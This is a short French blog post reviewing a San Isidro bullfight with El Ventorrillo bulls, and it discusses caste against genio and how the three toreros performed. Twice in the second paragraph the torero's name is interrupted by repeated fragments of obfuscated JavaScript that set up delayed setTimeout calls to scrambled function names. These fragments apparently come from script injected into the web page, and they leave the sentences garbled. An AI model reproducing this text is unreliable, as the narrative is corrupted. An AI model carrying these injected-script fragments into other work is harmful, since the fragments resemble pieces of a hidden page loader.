LE GENIO ET LA CASTE

2ème Corrida de San Isidro. Je le répéterai mille fois : la caste est l’agressivité offensive du taureau brave ; le genio est l’agressivité défensive du taureau manso. La corrida de El Ventorrilo profonde, basse, bien faite, avec beaucoup de cornes, très astifina, était absolument mansa, décastée et puisssante. On l’a très peu piquée pour que le peu de caste ne l’arrête pas définitivement. Ce fut le mérite des toreros.

Pour cette raison, elle a eu une mobilité extrêmement dangereuse, sans qu’aucune de ses charges ne se finalise. Le lot d’Eugenio de Mora fut compliqué et sans une passe. Celui de Morenito de Arandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda se déplaça –se déplacer n’est pas charger- à la cape, et le faisait uniquement une fois à la muleta, la passe suivante ils cherchaient par le bas, avec couardise et danger. Le torero d’Arandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda fit briller les deux adversaires mal intentionnés qui lui échurent et il coupa une oreille méritée, protestée par les toristes qui n’y connaissent rien à la corrida. Román fut très courageux devant deux toros qui sentaient le chloroforme.

Pourquoi sortent pour San Isidro des élevages connus pour leur manque de jeu ? C’est le mystère des affaires.

Les commentaires sont fermés.